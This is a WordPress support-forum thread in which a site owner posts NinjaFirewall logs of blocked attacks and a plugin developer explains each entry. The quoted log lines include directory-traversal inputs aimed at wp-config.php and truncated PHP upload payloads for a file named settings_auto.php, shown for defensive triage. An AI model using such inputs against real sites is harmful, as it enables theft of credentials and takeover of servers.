Question about some logs after hack

Hi,

21/Mar/19 17:16:23  #7144190  UPLOAD       -  192.99.15.139    POST /wp-admin/admin-post.php - File upload detected, no action taken - [rock.zip (2,860 bytes)] - mail.xxxxx.com
21/Mar/19 17:16:54  #4900521  UPLOAD       -  192.99.15.139    POST /wp-admin/admin-post.php - File upload detected, no action taken - [settings_auto.php (925 bytes)] - mail.xxxxx.com

The way NinjaFirewall and PHP handle uploads is explained in those threads:
https://www.ads-software.com/support/topic/file-upload-detected/
https://www.ads-software.com/support/topic/were-these-files-blocked/

If only you, the admin, are allowed to uploads files, consider disabling them in the Firewall Policies pages. See this post for more details: https://blog.nintechnet.com/securing-wordpress-with-a-web-application-firewall-ninjafirewall/ (scroll down to “File Uploads”).

21/Mar/19 17:16:23  #7383333  CRITICAL  1407  192.99.15.139    POST /wp-admin/admin-post.php - Unrestricted file upload - [GET:page = wysija_campaigns] - mail.xxxxx.com
21/Mar/19 17:17:40  #7238211  CRITICAL  1515  192.99.15.139    GET /index.php - Unauthorized action - [GET:up_auto_log = true] - mail.xxxxx.com
21/Mar/19 17:18:17  #8139554  CRITICAL     1  192.99.15.139    GET /index.php - Directory traversal - [GET:path = ../../../../../wp-config.php] - mail.xxxxx.com
21/Mar/19 17:18:30  #8476871  CRITICAL     1  192.99.15.139    GET /index.php - Directory traversal - [GET:pic = ../../../../../wp-config.php] - mail.xxxxx.com

Those are know issues, and there’s nothing to worry about. They’re attempting to exploit very old vulnerabilities.

21/Mar/19 17:17:17  #1852218  CRITICAL   155  192.99.15.139    POST /wp-admin/admin-ajax.php - Code injection - [POST:--b40265e60d5f25c1440f8db641ea5d6f%0d%0aContent-Disposition:_form-data;_name = "popimg"; filename="settings_auto.php"%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?php%0d%0afunction http_get($url){%0d%0a%09$im = c...] - mail.xxxxx.com
21/Mar/19 17:17:23  #3186679  CRITICAL   155  192.99.15.139    POST /index.php - Code injection - [POST:--836475a2fc97d3edcbb4a39618d84de2%0d%0aContent-Disposition:_form-data;_name = "file"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>%0d%0a<?...] - mail.xxxxx.com
21/Mar/19 17:18:08  #2792593  CRITICAL   155  192.99.15.139    POST /wp-admin/admin-ajax.php - Code injection - [POST:--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition:_form-data;_name = "action"%0d%0a%0d%0anm_personalizedproduct_upload_file%0d%0a--d083b06a6c24c0921269d254ec41188f%0d%0aContent-Disposition: form-data; name...] - mail.xxxxx.com
21/Mar/19 17:18:33  #1356479  CRITICAL   155  192.99.15.139    POST /index.php - Code injection - [POST:--6e73917032ae1df5b2a8bf273afccdc8%0d%0aContent-Disposition:_form-data;_name = "Filedata"; filename="files/settings_auto.php"%0d%0aContent-Type: multipart/form-data%0d%0a%0d%0a<title>Vuln!! patch it Now!</title>...] - mail.xxxxx.com

Those ones are very odd! To me, that looks like they come from a script kiddie who is learning how to use cURL but forgot to read its man page: he’s hopping to upload a files using HTTP POST data rather than HTTP multipart POST data, hence the mess! I would not worry more than that, the firewall kicked him out anyway.

The last two (#1353) are attemtps to exploit the WP GDPR Compliance plugin vulnerability that was patched last November.

Hi nintechnet,

thank you very much for the quick reply and your input!

I now already disabled uploads with your plugin.

Thanks again for the great support.
Its the first time Iam using your plugin, I will suggest to use it on other sites aswell. Will leave a review!